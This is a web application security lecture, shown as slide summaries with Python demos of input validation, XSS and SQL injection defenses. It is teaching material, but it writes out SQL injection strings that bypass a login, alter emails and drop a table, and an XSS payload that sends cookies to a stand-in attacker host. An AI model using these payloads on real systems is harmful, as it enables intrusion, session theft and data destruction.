Web Application Security and Awareness

Abdul Rahman Sherzad

Secure web programming and end users' awareness are the last line of defense against attacks targeted at corporate systems, particularly web applications, in the era of the World Wide Web. Most web application attacks occur through Cross-Site Scripting (XSS) and SQL Injection; most web application vulnerabilities, in turn, arise from weak coding: failure to properly validate user input and failure to properly sanitize output before displaying data to visitors. The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, 15% insufficient authentication, and others. Abdul Rahman Sherzad, lecturer at the Computer Science Faculty of Herat University and Ph.D. student at Technical University of Berlin, gave a presentation at the 12th IT Conference on Higher Education for Afghanistan at the MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan, introducing web application security threats by demonstrating the security problems that exist in corporate systems, with a strong emphasis on secure development. Major security vulnerabilities and secure design and coding best practices for designing and developing web-based applications were covered. The main objective of the presentation was to raise awareness of the problems that can occur in web application systems, and of secure coding practices and principles. Its aims were to build security awareness for web applications, to discuss the threat landscape and the controls to apply during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.

  • 1. Web Application Security and Awareness. Abdul Rahman Sherzad, Lecturer at the Computer Science Faculty of Herat University, Afghanistan, and Ph.D. Student at Technical University of Berlin, Germany. December 19, 2016: 12th IT Conference for Higher Education in Afghanistan. January 05, 2017: Hariwa Institute of Higher Education, Herat, Afghanistan.
  • 2. "Major problems were only caused by a collection of smaller factors, and only a reverse similar behavior is needed to resolve the given situation." (Sherzad)
  • 3. Goal and Objectives ■ Build security awareness for web applications ■ Get to know attack methods ■ Learn ways to discover security vulnerabilities ■ Learn the basics of secure web development
  • 4. Web Application Security ■ Websites ■ Web Applications ■ Web Services
  • 5. Intentions ■ Malicious Damage ■ Financial Gain ■ Blackmail ■ Further Attacks ■ Political ■ Competitor ■ Commercial ■ Personal Grievance ■ Discover Vulnerabilities ■ Show Skills [1]
  • 6. Security Threats ■ The majority of web application attacks occur through – Cross-Site Scripting (XSS) – SQL Injection ■ The majority of web application vulnerabilities arise from – Weak coding – Failure to properly validate input – Failure to sanitize output [2] [3] [4]
  • 7. 2010 Web Application Weaknesses (chart; as summarized in the abstract: 26% improper output handling, 22% improper input handling, 15% insufficient authentication, and others) [2] [3] [4]
  • 8. User Input ■ The attacker can easily change any part of the HTTP request before submitting it – Cookies – Form fields – Hidden fields – URL – Headers ■ The ultimate solution: input must be validated on the SERVER, not just on the CLIENT! Client-side checks improve usability but are not a security control, because the attacker simply bypasses the browser. [5]
  • 9. Client-side – Demo Link ■ Client-side validation (can be disabled by the client) – HTML5 – JavaScript ■ Input fields (can be modified by the client) – Hidden fields – Dropdowns ■ Cookies (can be changed by the client)
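The point of slides 8 and 9 in working code, as an added example that is not part of the presentation: a server-side handler that rebuilds an order from an untrusted request, ignoring the hidden price field, checking the dropdown value against an allow-list, range-checking the quantity, and refusing to treat a client-writable cookie as an authorization source. The catalog, field names, session store and limits are hypothetical.

```python
# Added example (not from the slides): server-side validation of a form whose
# hidden field, dropdown and cookie may all have been tampered with by the
# client. Catalog, field names, session store and limits are hypothetical.
from decimal import Decimal

# Hypothetical server-side catalog: the only trustworthy source of prices.
CATALOG = {"book": Decimal("12.50"), "pen": Decimal("1.20")}
SHIPPING = {"standard", "express"}   # the real dropdown options
MAX_QTY = 10

# Hypothetical server-side session store (opaque session id -> role).
# A cookie named "role" sent by the client is never consulted.
SESSIONS = {"s3ss10n-abc": "customer"}


class ValidationError(ValueError):
    pass


def validate_order(form: dict, cookies: dict) -> dict:
    """Rebuild an order from untrusted request data, trusting none of it.

    `form` and `cookies` are plain dicts of strings as a web framework would
    hand them over. Every field is checked here regardless of whatever
    HTML5/JavaScript validation ran (or was disabled) in the browser.
    """
    # Dropdown: allow-list, never "whatever the client sent".
    shipping = form.get("shipping", "")
    if shipping not in SHIPPING:
        raise ValidationError(f"unknown shipping option {shipping!r}")

    # Product: allow-list against the catalog.
    item = form.get("item", "")
    if item not in CATALOG:
        raise ValidationError(f"unknown item {item!r}")

    # Numeric field: type AND range, not just "looks like a number".
    try:
        qty = int(form.get("qty", ""))
    except ValueError:
        raise ValidationError("qty is not an integer") from None
    if not 1 <= qty <= MAX_QTY:
        raise ValidationError(f"qty {qty} out of range 1..{MAX_QTY}")

    # Hidden field "price": never used. The price is recomputed from the
    # catalog; a mismatch is only recorded so it can be logged.
    price_tampered = "price" in form and form["price"] != str(CATALOG[item])

    # Cookie: only an opaque session id, resolved server-side, decides the role.
    role = SESSIONS.get(cookies.get("session", ""), "anonymous")

    return {
        "item": item,
        "qty": qty,
        "shipping": shipping,
        "total": CATALOG[item] * qty,
        "role": role,
        "price_tampered": price_tampered,
    }


def check_order(form: dict, cookies: dict):
    """(True, order) or (False, reason) for callers that prefer a tuple."""
    try:
        return True, validate_order(form, cookies)
    except ValidationError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # Constructed request: hidden price lowered, dropdown edited, cookie forged.
    tampered = {"item": "book", "qty": "2", "shipping": "express", "price": "0.01"}
    print(check_order(tampered, {"session": "bogus", "role": "admin"}))
```

The hidden price is the classic case: the server must treat it as a display hint at most and recompute from its own data; the same applies to any "trust me" value the client echoes back.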
  • 10. Phishing – Demo Link ■ Attackers use e-mail or instant messages to "fish" for users' personal and financial information – User ID / password – Credit card number – PIN ■ In a typical phishing attack the user receives an e-mail message purporting to come from a bank or other e-commerce enterprise. ■ 1% to 20% of users respond to such attacks. ■ In Afghanistan it is very common and effective!!! [6] [7]
  • 11. Phishing – Ultimate Solutions ■ Policy guidelines ■ Training the end users ■ User awareness – Carefully check suspicious links! – Do not follow links in e-mails that ask for sensitive data! – Do not trust TinyURL (shortened) links! – Do not enter credit card or other sensitive data if the website address does not start with https:// (and even then check the domain: HTTPS only proves that the connection is encrypted, not that the site belongs to your bank) [6] [7]
  • 12. Cross-Site Scripting (XSS) ■ XSS is a vulnerability in which the attacker injects malicious client-side code into web pages that other users view. ■ It has been around since the 1990s. ■ Most major websites, including Google, Yahoo and Facebook, have been affected by cross-site scripting flaws at some point. ■ Attacks exploiting XSS vulnerabilities can steal data, take control of a user's session, run malicious code in the victim's browser, or be used as part of a phishing scam. – Reflected – Demo Link – Persistent – Basic Demo Link || Steal Cookie Demo Link [8] [9] [10]
  • 13. Preventing XSS Attacks ■ Filtering ■ Input validation / output sanitization (encode output for the context it is written into: HTML body, HTML attribute, JavaScript, URL) ■ Select a safer browser ■ Use a virtual machine for suspicious links ■ Pay more attention to shortened URLs ■ Use plugins for better security (like NoScript). [8] [9] [10]
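Slides 12 and 13 side by side, as an added example that is not part of the presentation: a reflected-XSS sink that echoes a search term into the HTML body and an attribute, the blacklist "filter out &lt;script&gt;" approach from the slide (bypassed by a payload that needs no script tag and by an attribute break-out), and context-aware output encoding that neutralises all three. The page markup, the attacker host and the payloads are constructed for the demo; the small HTMLParser subclass reports where a browser would run attacker-supplied JavaScript.

```python
# Added example (not from the slides): reflected XSS, a naive tag filter that
# is bypassed, and per-context output encoding that holds. Markup, attacker
# host and payloads are constructed for this demo.
import html
from html.parser import HTMLParser
from urllib.parse import quote


def render_vulnerable(query: str) -> str:
    """Reflects the search term straight into HTML text and an attribute."""
    return (f"<p>Results for: {query}</p>\n"
            f'<input name="q" value="{query}">')


def render_filtered(query: str) -> str:
    """'Filtering' as on the slide: strip literal <script> tags, nothing else."""
    cleaned = query.replace("<script>", "").replace("</script>", "")
    return render_vulnerable(cleaned)


def render_escaped(query: str) -> str:
    """Output encoding matched to the context: & < > " ' become entities,
    so the data can neither start a tag nor close the attribute quote."""
    safe = html.escape(query, quote=True)
    return (f"<p>Results for: {safe}</p>\n"
            f'<input name="q" value="{safe}">')


def render_link(query: str) -> str:
    """URL context: percent-encode first, then HTML-encode the attribute."""
    url_safe = quote(query, safe="")
    return f'<a href="/search?q={html.escape(url_safe, quote=True)}">again</a>'


# Constructed payloads (attacker.example is a reserved, non-routable name).
COOKIE_THIEF = ("<script>new Image().src='http://attacker.example/?c='"
                "+document.cookie</script>")            # slide 12 "steal cookie"
NO_SCRIPT_TAG = '<img src=x onerror="alert(document.cookie)">'  # no <script> at all
ATTR_BREAKOUT = '" autofocus onfocus="alert(1)'        # closes the value="..." quote


class ScriptFinder(HTMLParser):
    """Collects <script> elements and on* event-handler attributes: the
    places where a browser would execute JavaScript from the page."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("script")
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append(f"{tag}@{name}")


def script_sinks(page: str) -> list:
    """Return the script-execution points found in `page` (empty = none)."""
    finder = ScriptFinder()
    finder.feed(page)
    return finder.hits


if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable),
                         ("filtered", render_filtered),
                         ("escaped", render_escaped)]:
        for payload in (COOKIE_THIEF, NO_SCRIPT_TAG, ATTR_BREAKOUT):
            print(f"{name:10s} {payload[:24]!r:28s} -> {script_sinks(render(payload))}")
```

The filter "works" against the cookie thief and fails against the other two, which is why the slide's "filtering" is at best defense in depth; encoding on output, chosen per context, is the control that actually removes the vulnerability.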
  • 14. SQL Injection ■ SQL injection is a technique in which malicious users inject SQL commands into an SQL statement through – URLs – Input parameters – Others, e.g. cookies, HTTP headers ■ SQL injection is a very old approach but is still popular among attackers. [11] [12]
  • 15. Possible Threats ■ Unauthorized access to the application – User login without knowing the username or the password ■ Access to the whole database / all databases on the server – The attacker can delete, modify or, even worse, steal the data ■ Read / write files on the server's file system ■ Code execution [11] [12]
  • 16. SQL Injection – Demo Link ■ Login without knowing the username and the password – anything' OR TRUE; -- ■ Modify and steal the data – anything' OR 1; UPDATE users SET email = '[email protected]' WHERE email = '[email protected]';-- ■ Delete data and even drop the tables – anything' OR 1; DROP TABLE users; -- (the last two are stacked queries and only work where the database driver executes several statements in one call)
  • 17. Mitigate Risk ■ Always validate input ■ Escape user input ■ Least privilege ■ Use prepared statements ■ Code reviews ■ Salt & hash passwords [13] [14]
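The login bypass from slide 16 against a string-built query, and the same request against the mitigations from slide 17 (prepared statement, salted and hashed passwords), as an added example that is not part of the presentation. SQLite stands in for the real database; the schema, the user "alice", the PBKDF2 parameters and the dummy-hash trick are assumptions of this demo. The payload uses `OR 1=1 --` rather than the slide's `OR TRUE; --` because Python's sqlite3 module refuses anything after the first statement, which is also why the slide's stacked UPDATE and DROP payloads cannot be reproduced with this driver.

```python
# Added example (not from the slides): SQL injection login bypass against
# string concatenation vs. a parameterised query with salted PBKDF2 hashes.
# Schema, users, iteration count and the dummy hash are assumptions.
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ITERATIONS = 600_000   # assumed; tune to your hardware, never below ~100k


def hash_password(password: str, salt: bytes = None):
    """Return (salt, digest); a fresh random salt is drawn when none is given."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


# Hashed against a throw-away salt so that an unknown username costs the same
# time as a real check (otherwise response time reveals which usernames exist).
DUMMY_SALT, _DUMMY_HASH = hash_password("not-a-real-password")


def setup_db() -> sqlite3.Connection:
    """Two tables: the slide's plaintext layout and the hardened one."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users_plain (username TEXT, password TEXT)")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, hash BLOB)")
    db.execute("INSERT INTO users_plain VALUES ('alice', 'correct horse')")
    salt, digest = hash_password("correct horse")
    db.execute("INSERT INTO users VALUES (?, ?, ?)", ("alice", salt, digest))
    return db


def login_vulnerable(db, username: str, password: str):
    """Slide 14/16: the query is assembled from the raw request strings."""
    sql = ("SELECT username FROM users_plain WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Prepared statement, salted hash, constant-time comparison."""
    row = db.execute("SELECT username, salt, hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        hash_password(password, DUMMY_SALT)   # burn the same time, then refuse
        return None
    name, salt, stored = row
    _, candidate = hash_password(password, salt)
    return name if hmac.compare_digest(candidate, stored) else None


PAYLOAD = "anything' OR 1=1 --"   # same effect as the slide's  anything' OR TRUE; --


def demo() -> dict:
    """Run both logins with the payload and with honest credentials."""
    db = setup_db()
    return {
        "vulnerable_bypass": login_vulnerable(db, PAYLOAD, "wrong"),
        "safe_bypass": login_safe(db, PAYLOAD, "wrong"),
        "safe_legit": login_safe(db, "alice", "correct horse"),
        "safe_wrongpw": login_safe(db, "alice", "wrong"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

With the payload as username the concatenated query becomes `... WHERE username = 'anything' OR 1=1 --' AND password = 'wrong'`, so the password clause is commented out and the first user is returned; in the parameterised version the same string is simply a username that does not exist. "Escape user input" from the slide is the fallback for the rare place a parameter cannot be bound (a table or column name), not a substitute for prepared statements.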
  • 18. Conclusion – Core Security Principles ■ Use least privilege ■ Do not trust user input ■ Apply defense in depth ■ Fail securely and friendly ■ Turn off un-needed services ■ Keep systems patched ■ Watch for logic holes ■ Hide sensitive information – Encryption – Access controls [15] [16]
  • 19. Works Cited
    1 The Australian High Tech Crime Centre. (2005). Hacking Motives. Australia: Australian High Tech Crime Centre.
    2 Cenzic. (2014). Application Vulnerability Trends Report. Cenzic.
    3 The Open Web Application Security Project. (2013, June 12). OWASP Top Ten Project. Retrieved from OWASP: https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013
    4 The Web Application Security Consortium. (2011). Web-Hacking-Incident-Database. Retrieved from WASC: http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
    5 The Open Web Application Security Project. (2010, April 22). Unvalidated Input. Retrieved from OWASP: https://www.owasp.org/index.php/Unvalidated_Input
    6 The Open Web Application Security Project. (2009, April 14). Phishing. Retrieved from OWASP: https://www.owasp.org/index.php/Phishing
    7 Steinberg, J. (2014, August 25). Why You Are At Risk Of Phishing Attacks. Retrieved from Forbes: http://www.forbes.com/sites/josephsteinberg/2014/08/25/why-you-are-at-risk-of-phishing-attacks-and-why-jp-morgan-chase-customers-were-targeted-this-week/
    8 The Open Web Application Security Project. (2014, April 22). Cross-site Scripting (XSS). Retrieved from OWASP: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
    9 Abela, R. (2013, June 5). The Dangerous Complexity of Web Application Security. Retrieved from Netsparker: https://www.netsparker.com/blog/web-security/dangerous-complexity-of-web-application-security/
    10 Abela, R. (2013, May 22). Web Application Security Misconception: Are All Vulnerabilities Equally Dangerous? Retrieved from Netsparker: https://www.netsparker.com/blog/web-security/web-application-security-misconceptions-vulnerabilities/
    11 The Open Web Application Security Project. (2014, August 14). SQL Injection. Retrieved from OWASP: https://www.owasp.org/index.php/SQL_Injection
    12 Abela, R. (2013, May 28). South African Police Web Application for Whistleblowers Hacked via SQL Injection. Retrieved from Netsparker: https://www.netsparker.com/blog/news/south-african-police-whistleblowers-hacked-sql-injection/
    13 The Open Web Application Security Project. (2014, June 7). SQL Injection Prevention Cheat Sheet. Retrieved from OWASP: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
    14 Litwin, P. (2004, September). Stop SQL Injection Attacks Before They Stop You. Retrieved from MSDN: https://msdn.microsoft.com/en-us/magazine/cc163917.aspx
    15 Meier, J. D., Mackman, A., Dunner, M., Vasireddy, S., Escamilla, R., & Murukan, A. (2003). Improving Web Application Security: Threats and Countermeasures. Microsoft.
    16 Bollefer, T., Chander, G., Johansson, J., Kass, M., & Olson, E. (2002). Building and Configuring More Secure Web Sites. Microsoft.
